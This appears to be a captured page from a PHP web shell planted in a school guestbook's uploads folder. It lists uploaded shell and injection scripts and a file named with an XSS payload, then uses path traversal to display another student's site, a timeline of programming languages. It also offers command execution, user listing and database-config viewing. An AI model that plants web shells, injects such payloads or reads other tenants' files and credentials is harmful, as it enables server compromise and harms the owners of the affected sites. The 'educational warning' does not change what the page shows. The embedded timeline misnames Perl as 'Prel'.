🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../577325.klas4s23.mid-ica.nl/public_html/technowire-noob/pro-talen.html

<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="techno-home.css">
  <title>Document</title>
</head>

<body>

  <nav>

    <img class="logo" src="hall-images/L1-7 - Logo TechnoWire.png">

    <ul class="navbar">
      <li><a href="techno-home.html" style="--i:1">Home</a></li>
      <li><a href="silicon-valley.html" style="--i:2">Silicon Valley</a></li>
      <li><a href="pro-talen.html" style="--i:3" class="active">Programming languages</a></li>
      <li><a href="hall-of-fame.html" style="--i:4">ICT-Hall of fame</a></li>
    </ul>
  </nav>

  <div class="inleiding">
    <h1>*Introduction: Overview of Programming Languages</h1>
    <p>Programming languages can be categorized into different main groups, each with its unique features and
      applications.
      Understanding these categories is essential to comprehend the evolution of programming languages and appreciate
      their
      impact on the technological world. Below, the key categories are explained:</p>

    <div class="machine">
      <h2>1. Machine Code:</h2>
      <p>Machine code consists of sequences of zeros and ones directly understood by a computer processor. It represents
        the
        most fundamental form of programming and is specific to a particular hardware architecture. An example of
        machine code
        might look like this: 10110000 01100001.</p>
    </div>


    <div class="assembly">
      <h2>2. Assembly Languages (Assembly):</h2>
      <p> Assembly languages are successors to machine code and provide a more human-readable form of programming. These
        languages translate symbolic instructions into the corresponding machine language. An example of assembly code
        could
        look like this:</p>
      <img class="inlei-images" src="hall-images/assembly.jpg">
    </div>
    <div class="high-Level">

      <h2>3. High-Level Programming Languages:</h2>
      <p>High-level programming languages, such as C, Java, and Python, are designed to reduce the complexity of
        programming.
        They use readable syntax and provide abstraction from the underlying hardware. Here's an example of a simple
        program
        in C:</p>
      <img class="inlei-images" src="hall-images/basic-c.jpg">
    </div>

    <div class="fourth">
      <h2>4. Fourth-Generation Languages (4GL):</h2>
      <p>Fourth-generation languages are specialized languages designed for specific tasks, like SQL for databases and
        MATLAB
        for scientific calculations. They enable users to accomplish complex operations with minimal code. An example
        SQL
        query might look like this:</p>
      <img class="inlei-images" src="hall-images/sql.jpeg">
    </div>
    <div class="object">
      <h2>5. Object-Oriented Languages:</h2>
      <p>Object-oriented languages, such as C++ and Java, organize data into objects containing both data and
        associated
        functions. This approach promotes reusability and modularity in the code. Here's an example of a class in Java:
      </p>

      <img class="inlei-images" src="hall-images/java.jpg">

      <p>main categories represent the evolution of programming languages, each with its advantages and
        applications.
        In the following sections, we will explore some of the most influential programming languages within these
        categories and discuss their contributions to the world of computer science.
      </p>
    </div>
  </div>

  <div class="container">

    <div class="item1">

      <div class="tijd-lijn1">
        <b class="year">1954</b>
      </div>

      <div class="photo1">
        <img class="images9" src="hall-images/fortran.png">
      </div>

      <div class="text1">

        <h1>FORTRAN</h1>
        <p>
          Name of the Programming Language: Fortran (FORmula TRANslation). <br>
          Developer(s): IBM (designed by John Backus)
        <ul>Specific Features:
          <li>Fortran is one of the oldest programming languages still in use.</li>
          <li>It is designed for scientific and engineering calculations, especially in situations where efficiency and
            speed are crucial.</li>
          <li>It uses a simple syntax, making it easy to perform complex mathematical operations.</li>
        </ul>
        </p>
      </div>

    </div>

    <div class="item2">

      <div class="photo2">
        <img class="images9" src="hall-images/cobol.jpeg">
      </div>

      <div class="text2">

        <h1>
          COBOL
        </h1>
        <p>Name of the Programming Language: COBOL (COmmon Business-Oriented Language). <br>
          Developer(s): COBOL standardization was led by a committee of technicians from various companies and
          government entities. Grace Hopper played a significant role in COBOL's development.
        <ul>Specific Features:
          <li>COBOL is designed for business, finance, and administrative systems.</li>
          <li>It emphasizes readability and simplicity, with a clear syntax that resembles natural language.</li>
          <li>COBOL has built-in support for processing text files and tables, making it ideal for data processing
            tasks.</li>
        </ul>
        </p>
      </div>

      <div class="tijd-lijn2">
        <b class="year">1959</b>
      </div>

    </div>

    <div class="item3">

      <div class="tijd-lijn3">
        <b class="year">1964</b>
      </div>

      <div class="photo3">
        <img class="images9" src="hall-images/basic.jpeg">
      </div>
      <div class="text3">
        <h1>BASIC</h1>
        <p>Programming Language Name: BASIC (Beginner's All-purpose Symbolic Instruction Code).<br>
          Developers: John G. Kemeny and Thomas E. Kurtz developed the original BASIC language at Dartmouth College in
          1964.
        <ul>Specific Features:
          <li>BASIC is designed for beginners and aims to be simple and easy to understand, making it an excellent
            choice for people new to programming.</li>
          <li>It has straightforward syntax, allowing users to write programs quickly with minimal complexity.</li>
          <li>BASIC is an interpreted language, meaning that the source code is executed line by line, making it easy to
            debug and test code interactively.</li>
        </ul>
        </p>
      </div>
    </div>

    <div class="item4">

      <div class="photo4">
        <img class="images9" src="hall-images/c.png">
      </div>

      <div class="text4">
        <h1>
          C Programming Language
        </h1>
        <p>Programming Language Name: C.<br>
          Developers: C was developed by Dennis Ritchie at Bell Labs in the early 1970s. It was based on the B language
          developed by Ken Thompson.
        <ul>Specific Features:
          <li>Efficiency: C allows for low-level memory manipulation and provides direct access to memory addresses,
            making it highly efficient.</li>
          <li>Portability: C programs can run on different hardware platforms with little or no modification, thanks to
            its platform-independent nature.</li>
          <li>Modularity: C supports the use of functions and libraries, allowing developers to write modular and
            reusable code</li>
        </ul>
        </p>
      </div>

      <div class="tijd-lijn4">
        <b class="year">1969</b>
      </div>

    </div>

    <div class="item5">

      <div class="tijd-lijn5">
        <b class="year">1970</b>
      </div>

      <div class="photo5">
        <img class="images9" src="hall-images/pascal.png">
      </div>

      <div class="text5">
        <h1>PASCAL</h1>
        <p>Programming Language Name: Pascal.
          <br>Developer(s): Pascal was designed by Professor Niklaus Wirth in 1968 and named after the French
          mathematician and philosopher Blaise Pascal.

        <ul>Specific Features:
          <li>Readability: Pascal emphasizes readability and clarity of code, making it easy to learn and understand,
            especially for beginners.</li>
          <li>Structured Programming: Pascal supports structured programming techniques, encouraging the use of
            procedures, functions, and blocks, promoting modular and maintainable code.</li>
          <li>Strong Typing: Pascal enforces strong typing, meaning variable types must be explicitly declared,
            enhancing program reliability by reducing the risk of type-related errors.</li>

        </ul>
        </p>
      </div>

    </div>

    <div class="item6">

      <div class="photo6">
        <img class="images9" src="hall-images/c++.png">
      </div>

      <div class="text6">
        <h1>C++</h1>
        <p>Programming Language Name: C++. <br>
          Developer(s): C++ was developed by Bjarne Stroustrup at Bell Labs in Murray Hill, New Jersey during the early
          1980s.
        <ul>Specific Features:
          <li>Object-Oriented Programming (OOP): C++ supports the principles of OOP, including encapsulation,
            inheritance, and polymorphism, allowing developers to structure code in a more organized and efficient
            manner.</li>
          <li>Low-Level Manipulation: C++ retains the low-level memory manipulation features of C, providing direct
            access to memory addresses and pointers.</li>
          <li>Standard Template Library (STL): C++ includes a powerful library called STL, which provides various
            generic classes and functions, including algorithms, iterators, and containers, simplifying complex data
            structures and algorithms implementation.</li>

        </ul>
        </p>
      </div>

      <div class="tijd-lijn6">
        <b class="year">1983</b>
      </div>

    </div>

    <div class="item7">

      <div class="tijd-lijn7">
        <b class="year">1987</b>
      </div>

      <div class="photo7">
        <img class="images9" src="hall-images/prel.jpeg">
      </div>

      <div class="text7">
        <h1>Prel</h1>
        <p>Programming Language Name: Prel. <br>Developer(s): Larry wall
        <p>
        <ul>Specific Features:
          <li> Combines C and UNIX scripting languages like sh, sed, and awk.</li>

        </ul>
        </p>
      </div>

    </div>

    <div class="item8">

      <div class="photo8">
        <img class="images9" src="hall-images/python.jpeg">
      </div>

      <div class="text8">
        <h1>PYTHON</h1>
        <p>Programming Language Name: Python. <br>
          Developer(s): Python was created by Guido van Rossum. The development of Python started in the late 1980s, and
          the first official Python release, Python 0.9.0, came out in February 1991.
        <ul>Specific Features:
          <li>Readability: Python emphasizes code readability and simplicity, using a clean and easy-to-read syntax,
            which makes it an excellent language for beginners.</li>
          <li>Versatility: Python is a versatile language used in various fields, including web development, data
            analysis, artificial intelligence, scientific computing, automation, and more.</li>
          <li>Dynamically Typed: Python is dynamically typed, meaning you don't need to declare the data type of a
            variable when you define it. This simplifies the code-writing process.</li>
        </ul>
        </p>
      </div>

      <div class="tijd-lijn8">
        <b class="year">1991</b>
      </div>

    </div>

    <div class="item9">

      <div class="tijd-lijn9">
        <b class="year">1993</b>
      </div>

      <div class="photo9">
        <img class="images9" src="hall-images/ruby.jpeg">
      </div>

      <div class="text9">
        <h1>RUBY</h1>
        <p>Programming Language Name: Ruby. <br>
          Developer(s): Ruby was created by Yukihiro Matsumoto, often simply known as Matz, in the mid-1990s in Japan.
        <ul>Specific Features:
          <li>Object-Oriented: Ruby is a pure object-oriented language. Everything in Ruby is treated as an object,
            making it highly versatile for object-oriented programming paradigms.</li>
          <li>Dynamic Typing: Ruby is dynamically typed, meaning you don't have to declare the data type of a variable.
            The interpreter determines the type of the object at runtime.</li>
          <li>Clean and Readable Syntax: Ruby's syntax is elegant and easy to read, which promotes developer
            productivity and happiness. It's often cited as one of Ruby's most significant strengths.</li>
        </ul>
        </p>
      </div>

    </div>

    <div class="item10">

      <div class="photo10">
        <img class="images9" src="hall-images/php.png">
      </div>



      <div class="text10">
        <h1>PHP</h1>
        <p>Programming Language Name: PHP (Hypertext Preprocessor). <br>
          Developer(s): PHP was created by Rasmus Lerdorf in 1994. Over the years, it has been further developed and
          maintained by a large and active community of developers.
        <ul>Specific Features:
          <li>Server-Side Scripting: PHP is a server-side scripting language, meaning it is executed on the server,
            generating dynamic web pages. This allows developers to create interactive and dynamic websites.</li>
          <li>Simplicity: PHP has a simple and easy-to-understand syntax, making it accessible to beginners. It
            integrates seamlessly with HTML, making it popular for web development.</li>
          <li>Database Integration: PHP provides built-in support for various databases, allowing developers to easily
            connect to databases like MySQL, PostgreSQL, and SQLite.</li>
        </ul>
        </p>
      </div>
      <div class="tijd-lijn10">
        <b class="year">1995</b>
      </div>

    </div>

    <div class="item11">

      <div class="tijd-lijn11">
        <b class="year">1995</b>
      </div>

      <div class="photo11">
        <img class="images9" src="hall-images/java.png">
      </div>

      <div class="text11">
        <h1>JAVA</h1>
        <p>Programming Language Name: Java. <br>
          Developer(s): Java was developed by James Gosling and his team at Sun Microsystems (which was later acquired
          by Oracle Corporation) in the mid-1990s.
        <ul>Specific Features:
          <li>Object-Oriented: Java is a purely object-oriented programming language. It encourages the use of objects
            and classes, making it easier to organize and structure code.</li>
          <li>Platform Independence: Java programs are compiled into bytecode, which can be executed on any Java Virtual
            Machine (JVM). This "write once, run anywhere" capability allows Java applications to run on different
            platforms without modification.</li>
          <li>Strongly Typed: Java enforces strong data typing, requiring explicit declaration of variable types. This
            helps catch errors during compilation, enhancing the stability of programs.</li>
        </ul>
        </p>
      </div>

    </div>

    <div class="item12">

      <div class="photo12">
        <img class="images9" src="hall-images/script.png">
      </div>


      <div class="text12">
        <h1>JAVA SCRIPT</h1>
        <p>Programming Language Name: JavaScript. <br>
          Developer(s): JavaScript was developed by Brendan Eich while he was working at Netscape Communications
          Corporation. The language was first introduced in 1995 as part of Netscape Navigator web browser.
        <ul>Specific Features:
          <li>Versatility: JavaScript is primarily known as a client-side scripting language for web development,
            allowing developers to create interactive and dynamic user interfaces within web browsers.</li>
          <li>Object-Based: JavaScript is object-based, meaning it treats data as objects and allows developers to
            create and manipulate objects, making it a versatile language for various programming tasks.</li>
          <li>Event-Driven: JavaScript is often used for event-driven programming, allowing developers to create
            functions that respond to user interactions like clicks, scrolls, and keyboard input.</li>
        </ul>
        </p>
      </div>

      <div class="tijd-lijn12">
        <b class="year">1995</b>
      </div>

    </div>

    <div class="item13">

      <div class="tijd-lijn13">
        <b class="year">2005</b>
      </div>

      <div class="photo13">
        <img class="images9" src="hall-images/rails.png">
      </div>

      <div class="text13">
        <h1>RUBY ON RAILS</h1>
        <p>Programming Language Name: Ruby (Rails is a web application framework written in Ruby). <br>
          Developer(s): Rails, also known as Ruby on Rails, was extracted by David Heinemeier Hansson from his work on
          the project management tool Basecamp at 37signals (now Basecamp). The framework was first released as
          open-source in July 2004.
        <ul>Specific Features:
          <li>Model-View-Controller (MVC) Architecture: Rails follows the MVC architectural pattern, which separates the
            application logic into three interconnected components: Model (data and business logic), View (user
            interface), and Controller (handles user requests and manages the flow of data).</li>
          <li>Convention over Configuration (CoC): Rails promotes sensible defaults and conventions, reducing the need
            for configuration files. This convention over configuration approach streamlines development and enhances
            consistency among Rails projects.</li>
          <li>Don't Repeat Yourself (DRY) Principle: Rails encourages the DRY principle, aiming to eliminate redundancy
            by reusing code components. This leads to more maintainable and efficient code.</li>
        </ul>
        </p>
      </div>

    </div>

  </div>

  <footer class="end">


    <section class="endlo">

      <a target="_blank" href="https://www.rocmn.nl/">ROC Midden Nederland</a>

      <a target="_blank" href="/portfolio_noob/index.html">Moor about us</a>

      <a href="tel:0638524948">0638524948</a>

    </section>

  </footer>

</body>

</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!